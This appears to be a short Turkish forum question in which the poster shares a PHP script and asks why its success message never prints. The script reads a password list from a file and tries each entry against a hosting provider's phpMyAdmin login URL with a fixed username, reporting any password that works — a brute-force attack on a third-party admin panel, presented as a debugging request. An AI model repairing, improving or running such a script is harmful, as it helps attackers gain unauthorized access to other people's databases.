Ben phpmyadmin için bir oturum açma komut dosyası kodu için çalışıyor
<?php
$user = "Domain";
$passwords = file("passwords.txt");
foreach ( $passwords as $pass){
$source = file_get_contents("http://dbadmin.one.com/index.php?lang=en&server=1&pma_username=$user&pma_password=$pass");
if(preg_match("/Database/", $source)):
echo "Login Worked with: {$pass}";
endif;
}
?>
Benim Sorun öyle, burada işleri yok
echo "Login Worked with: {$pass}";
Eğer sorun görüyor musunuz?